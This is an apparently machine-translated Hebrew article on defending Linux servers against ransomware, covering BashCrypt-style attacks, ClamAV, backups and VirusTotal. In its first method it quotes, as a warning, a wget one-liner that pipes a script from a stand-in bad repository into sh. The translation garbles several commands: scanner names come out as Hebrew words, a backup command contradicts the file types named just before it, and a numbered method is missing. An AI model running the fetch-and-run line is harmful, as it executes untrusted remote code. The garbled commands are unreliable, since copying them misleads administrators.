כופר היא אחת הבעיות המאיימות בעולם אבטחת הרשת כיום. זה מפחיד לחשוב שמישהו יכול להחזיק את הנתונים שלך כבן ערובה. חלק מזיהומי הכופר מצפינים את כל הנתונים בנפח מסוים, והאנשים שעומדים מאחוריה דורשים סכום כסף מסוים לפני שיסכימו לשחרר את המפתח הדרוש לפתיחת הנתונים האמורים. זה נוגע במיוחד לאנשים שיש להם הרבה מאוד כסף שהושקע בנתונים שלהם. יש מעט חדשות טובות עבור משתמשי לינוקס.
ברוב המצבים, קשה לקוד כופר להשיג שליטה בדבר יותר מאשר רק בספרייה הביתית של המשתמש. לתוכניות אלה אין הרשאות לאשפה של התקנה שלמה. זו הסיבה שתוכנות כופר של לינוקס מהוות יותר בעיה בשרתים שבהם למפעילים תמיד יש גישה שורשית. תוכנת כופר לא אמורה להיות בעיה גדולה עבור משתמשי לינוקס, ויש לבצע מספר צעדים כדי למנוע את זה.
שיטה 1: התגוננות מפני התקפות בסגנון BashCrypt
BasyCrypt הוא הוכחה לקטע מושג של תוכנת כופר שהוכיחה שאפשר להדביק מבני שרת בקוד זדוני מסוג זה. זה מספק בסיס בסיס לחבילות כופר של לינוקס עשויות להיראות. למרות שהם אינם שכיחים כרגע, אותם סוגים של אמצעי מניעה לשכל הישר למנהלי שרתים של פלטפורמות אחרות עובדים כאן באותה מידה. הבעיה היא שבסביבות ברמה ארגונית ייתכן שיש מספר רב של אנשים שונים המשתמשים במערכת מארחת.
אם אתה מנהל שרת דואר, זה יכול להיות קשה מאוד למנוע מאנשים לעשות דברים מטופשים. עשו כמיטב יכולתכם להזכיר לכולם לא לפתוח קבצים מצורפים שאינם בטוחים בהם, ותמיד תוכנות זדוניות סורקות את כל הדברים המדוברים. דבר נוסף שיכול באמת לעזור במניעת התקפות מסוג זה נובע מצפייה בהתקנת קבצים בינאריים באמצעות wget. מטבע הדברים ששרת הדואר שלך כנראה חסר סביבת שולחן עבודה לחלוטין, וכנראה שאתה משתמש ב- wget, apt-get, yum או pacman כדי לנהל חבילות שמגיעות. חשוב מאוד לצפות באילו מאגרים משתמשים במתקנים אלה. לפעמים תראה פקודה שרוצה שתבצע משהו כמו wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, או שזה יכול להיות בתוך סקריפט פגז. כך או כך, אל תפעיל אותו אם אינך יודע לשם מה נועד המאגר הזה.
שיטה 2: התקנת חבילת סורק
קיימות כמה חלקים של טכנולוגיית סריקת תוכנות זדוניות בקוד פתוח. ClamAV הוא המפורסם ביותר, ואתה יכול להתקין אותו על הפצות רבות מבוססות apt באמצעות:
sudo apt-get install clamav
כאשר הוא מותקן, איש clamav צריך להסביר את השימוש בשפה פשוטה. זכור שבעוד שהוא יכול לסרוק ולהסיר קבצים נגועים, הוא לא יכול למעשה להסיר קוד זיהומי מקובץ. זהו מצב הכל או כלום.
יש סורק שני שאולי אינך מכיר, אך הוא שימושי אם תהליכים נסתרים הם שמפחידים אותך. שוב אם אתה משתמש בהפצה מבוססת apt, הוצא פקודה זו להתקנת הסורק:
sudo apt-get להתקין הסתר
כשהוא מותקן, הקלד:
סודו להסיר מערכות
זה יבצע סריקה מלאה של המערכת שלך עבור כל התהליכים הנסתרים.
שיטה 4: שמירה על גיבויים נקיים בהישג יד
אמנם זה לא אמור להיות אפילו בעיה מכיוון שכולם צריכים תמיד לבצע גיבויים, אך לאחר גיבויים טובים ניתן למחוק תוכנות כופר באופן מיידי. איזה מעט מאוד כופר שיש בפלטפורמת לינוקס נוטה לתקוף קבצים עם סיומות ספציפיות לפלטפורמות פיתוח אתרים. פירוש הדבר שאם יש לך המון קוד .php, .xml או .js, ברצונך לגבות זאת באופן ספציפי. שקול את שורת הקוד הבאה:
tar -cf backups.tar $ (find -name “* .ruby” -or -name “* .html”)
זה אמור ליצור קובץ ארכיון קלטות גדול של כל קובץ עם סיומות .ruby ו- .html בתוך מבנה הקובץ. לאחר מכן ניתן להעביר אותו לספריית משנה זמנית אחרת לצורך חילוץ כדי להבטיח שיצירתו פועלת כראוי.
ניתן וצריך להעביר את ארכיון הקלטות הזה לכרך חיצוני. ניתן כמובן להשתמש בדחיסת .bz2, .gz או .xv לפני כן. ייתכן שתרצה ליצור גיבויים מראים על ידי העתקתם לשני כרכים שונים.
שיטה 5: שימוש בסורקים מבוססי אינטרנט
אולי הורדת חבילת RPM או DEB מאתר שמבטיח להכיל תוכנה שימושית. תוכנה מופצת גם באמצעות 7z או קבצי זפת דחוסים. משתמשים ניידים עשויים גם לקבל חבילות אנדרואיד בפורמט APK. קל לסרוק אותם בעזרת כלי ישירות בדפדפן שלך. הצבע על https://www.virustotal.com/, וברגע שהעמוד נטען לחץ על כפתור 'בחר קובץ'. לפני שאתה מעלה, זכור שמדובר בשרת ציבורי. זה אמנם בטוח ומנוהל על ידי Alphabet Inc, אך הוא מעביר קבצים באופן ציבורי, מה שעשוי להיות בעיה בכמה סביבות מאובטחות במיוחד. זה מוגבל גם ל 128 קבצי MB.
בחר את הקובץ שלך בתיבה שעולה ובחר פתח. שם הקובץ יופיע בשורה שליד הכפתור לאחר שהקופסה תיעלם.
לחץ על הכחול הגדול 'סרוק אותו!' לַחְצָן. תראה תיבה נוספת המציינת שהמערכת מעלה את הקובץ שלך.
אם מישהו כבר בדק את הקובץ מראש, הוא יודיע לך על הדוח הקודם. זה מזהה זאת על סמך סכום SHA256, שעובד באותה צורה כמו אותם כלי שורת הפקודה של לינוקס שהתרגלתם אליהם. אם לא, היא תריץ סריקה מלאה עם 53 תוכניות סריקה שונות. כמה מהם עשויים להפסיק זמן מה כאשר הקובץ מופעל, וניתן להתעלם מתוצאות אלה בבטחה.
תוכניות מסוימות עשויות להחזיר תוצאות שונות מאחרות, ולכן קל לעשב תוצאות חיוביות כוזבות במערכת זו. החלק הטוב ביותר הוא שהוא עובד בין פלטפורמות שונות, מה שהופך אותו לאטרקטיבי באותה מידה ללא קשר לאיזו הפצה יש לך במכשירים שונים. זה גם עובד באותה מידה מהפצות סלולריות כמו אנדרואיד, וזו שוב הסיבה שזו דרך נהדרת לבדוק חבילות APK לפני השימוש בהן.
4 דקות קריאה
